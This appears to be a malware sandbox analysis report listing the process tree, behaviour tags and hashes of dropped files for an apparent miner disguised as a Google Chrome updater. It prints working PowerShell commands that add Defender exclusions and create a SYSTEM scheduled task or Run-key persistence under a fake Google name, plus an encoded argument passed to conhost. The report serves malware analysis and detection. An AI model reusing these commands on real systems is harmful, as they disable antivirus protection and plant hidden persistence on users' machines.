- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:1472
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4380 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2608 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Detects videocard installed
PID:1892 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qtdiqnkejoz2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:4916 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:1904 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz2⤵PID:3096
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4772
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
111KB
MD5d8e25f13068db84d7d829c7ce46a5b27
SHA18aa1046b90744fecad290416cee2694c7bb0b7be
SHA2560869376931f84fd95705fbced07597645ce1eb95fe0d1f4df117c5476b875ce2
SHA512a2b02d7dd6abaef974c2dae822cb3f237045b65eecb95590ab041ca2b010f05fa36611d96a905738ab328b979922d4776fce911dfebaf0c6b173a6de3385aec8
-
Filesize
1.8MB
MD55dcfa1b1411130b2c0b71ae5dd5e12c7
SHA131d40656d1c4b98a09a1852cacd86c917509c2bd
SHA256718ece0cd9c53e7fd5af2cf908dc6d1ccfdd4c47f6434790bdf8be2f43ccf336
SHA512faad04c84b677d8ed8d79233c17f4bd00ee55933a05be3cbd1322d72a5c308344ebb270743e3af23afa112e5e53d2315b2e0bbf46587061b89d8a654d63b7aab
-
Filesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
1KB
MD558f473558345c4d2feab48d4999b148a
SHA1a58fec1ddadb3cb692cd1bac3d21d09592ec58ee
SHA25669496654c76a65ba517bb7ee3bacb598a1e778aa7ee7807bf7318087d8d39d22
SHA512f19f50701c05d050fa114e29544e77ce620c4f05619262781eb5a12906f3e4a0219d79ea574e2ace3bdad8c25346f2dad71e9768f64361321e9299061b7b87d0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5